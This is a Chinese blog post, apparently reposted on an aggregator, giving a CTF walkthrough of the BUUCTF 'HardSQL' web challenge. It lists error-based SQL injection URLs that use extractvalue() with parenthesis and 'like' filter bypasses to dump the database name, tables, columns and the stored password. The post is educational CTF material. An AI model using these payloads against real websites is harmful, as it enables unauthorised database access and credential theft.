极客大挑战2020_CTF-Web-[极客大挑战 2019]HardSQL
生活随笔
收集整理的這篇文章主要介紹了
极客大挑战2020_CTF-Web-[极客大挑战 2019]HardSQL
小編覺(jué)得挺不錯(cuò)的,現(xiàn)在分享給大家,幫大家做個(gè)參考.
CTF-Web-[極客大挑戰(zhàn) 2019]HardSQL
博客說(shuō)明
文章所涉及的資料來(lái)自互聯(lián)網(wǎng)整理和個(gè)人總結(jié),意在于個(gè)人學(xué)習(xí)和經(jīng)驗(yàn)匯總,如有什么地方侵權(quán),請(qǐng)聯(lián)系本人刪除,謝謝!本文僅用于學(xué)習(xí)與交流,不得用于非法用途!
CTP平臺(tái)
網(wǎng)址
https://buuoj.cn/challenges
題目
Web類(lèi),[極客大挑戰(zhàn) 2019]HardSQL
打開(kāi)題目的實(shí)例
思路
SQl的題目,首先試一試萬(wàn)能密碼
試一下雙寫(xiě)
看來(lái)被封死了,想想其他的辦法,可以使用extractvalue和updatexml進(jìn)行報(bào)錯(cuò)注入,空格和=號(hào)沒(méi)有,所以我們要使用()來(lái)代替空格,使用like來(lái)代替=號(hào)
使用extractvalue()
/check.php?username=admin&password=admin'^extractvalue(1,concat(0x7e,(select(database()))))%23這一下報(bào)錯(cuò)把數(shù)據(jù)庫(kù)名給爆出來(lái)了
爆表 /check.php?username=admin&password=admin'^extractvalue(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where((table_schema)like('geek')))))%23 爆字段 /check.php?username=admin&password=admin'^extractvalue(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where((table_name)like('H4rDsq1')))))%23 爆數(shù)據(jù)把password查出來(lái)
/check.php?username=admin&password=admin'^extractvalue(1,concat(0x7e,(select(password)from(geek.H4rDsq1))))%23flag出來(lái)了,不對(duì)好像只有一半,使用{left(),right()}
/check.php?username=admin&password=admin%27^extractvalue(1,concat(0x7e,(select(left(password,30))from(geek.H4rDsq1))))%23/check.php?username=admin&password=admin%27^extractvalue(1,concat(0x7e,(select(right(password,30))from(geek.H4rDsq1))))%23拼接起來(lái)就是flag了
感謝
BUUCTF
以及勤勞的自己
總結(jié)
以上是生活随笔為你收集整理的极客大挑战2020_CTF-Web-[极客大挑战 2019]HardSQL的全部?jī)?nèi)容,希望文章能夠幫你解決所遇到的問(wèn)題。
- 上一篇: 前端如何实现音乐盒胶盘的转动_郑州Web
- 下一篇: python库下载安装报错_python